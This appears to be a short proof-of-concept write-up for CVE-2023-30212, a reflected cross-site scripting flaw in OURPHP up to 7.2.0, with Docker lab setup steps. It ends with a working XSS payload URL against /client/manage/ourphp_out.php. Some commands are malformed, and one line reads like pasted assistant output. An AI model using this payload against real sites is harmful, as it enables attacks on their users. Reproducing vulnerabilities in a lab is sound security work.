CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php
-
let’s download Dockerfile
-
Open Terminal in the folder where you downloaded the dockerfile
-
Install Docker on your machine
kali@kali:~$sudo apt install -y docker.io
-
Create a new Docker image
kali@kali:~$docker build -t test
-
Create a new Docker container
kali@kali:~$ docker run -d -p 80:80 test
-
Take Docker shell
kali@kali:~$docker ps
Now get the container id like 0ac7c99ad8e7
kali@kali:~ docker exec -it 0ac7c99ad8e7 /bin/bash
root@0ac7c99ad8e7:/var/www/html#
Now get the docker shell
-
Set up the database
root@0ac7c99ad8e7:/var/www/html# mysql
Then type these comments:-
-GRANT ALL PRIVILEGES ON . TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
-FLUSH PRIVILEGES;
The command you provided is a MySQL or MariaDB statement used to grant all privileges to the 'root' user on all databases and tables. Let's break down the components of the command
Now the password is set, now go to the website and enter the password and configure
url :- http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(xss)</script>
This website is xss vulnerable because xss script is hit when you enter this url parameter